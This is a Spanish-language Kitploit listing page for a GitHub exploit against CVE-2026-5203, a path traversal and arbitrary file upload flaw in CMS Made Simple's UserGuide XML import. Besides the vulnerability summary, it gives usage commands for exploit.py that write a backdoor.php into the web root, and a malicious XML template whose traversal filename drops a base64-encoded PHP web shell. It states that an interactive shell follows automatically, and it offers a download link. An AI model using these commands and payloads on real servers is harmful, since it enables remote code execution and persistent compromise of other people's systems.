Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-5203 — Exploit para CVE-2026-5203 en CMS Made Simple, aprovechando path traversal y subida arbitraria de archivos para lograr ejecución remota de código con un shell interactivo. | Kitploit
Herramientas/GitHubGitHub/caginkyr/cve-2026-5203
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubcaginkyr/cve-2026-5203

CVE-2026-5203

Exploit para CVE-2026-5203 en CMS Made Simple, aprovechando path traversal y subida arbitraria de archivos para lograr ejecución remota de código con un shell interactivo.

Ver Repositorio
2hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-5203 — CMS Made Simple ≤ 2.2.22 RCE (Path Traversal + Subida Arbitraria de Archivos)

CVSS Version Type

Resumen

La funcionalidad de importación XML del módulo UserGuide en CMS Made Simple ≤ 2.2.22 no sanitiza los nombres de archivo proporcionados por el usuario, lo que permite a un administrador autenticado subir archivos arbitrarios (por ejemplo, shells PHP web) a cualquier parte del sistema de archivos del servidor mediante secuencias de path traversal.

CampoValor
TipoPath Traversal / Subida Arbitraria de Archivos → RCE
ComponenteMódulo UserGuide — Importación XML
Archivo afectadomodules/UserGuide/lib/class.UserGuideImporterExporter.php
CVSS v3.17.2 HIGH — CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Autenticación requeridaSí (Administrador)

Código vulnerable

root@kitploit:~
// modules/UserGuide/lib/class.UserGuideImporterExporter.php (~L250-280)
$filename = (string) $xmlFile->filename;
$isdir    = (string) $xmlFile->isdir;   

La función escribe el contenido decodificado en Base64 directamente en la ruta controlada por el atacante.


Uso

root@kitploit:~
python exploit.py <base_url> <admin_url> <username> <password> [upload_path]

Ejemplos:

root@kitploit:~
# Ruta por defecto
python exploit.py http://target.com http://target.com/admin admin password123

# Ruta de subida personalizada
python exploit.py http://target.com http://target.com/admin admin password123 \
  ../../../../../../var/www/html/backdoor.php

La shell interactiva se inicia automáticamente si el web shell es accesible después de la subida.


Estructura XML maliciosa

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<modulecontent>
  <module>UserGuide</module>
  <version>1.3</version>
  <files>
    <file>
      <filename>../../../webshell.php</filename>
      <isdir>0</isdir>
      <data>[BASE64_ENCODED_PHP_CODE]</data>
    </file>
  </files>
</modulecontent>
Descargar herramienta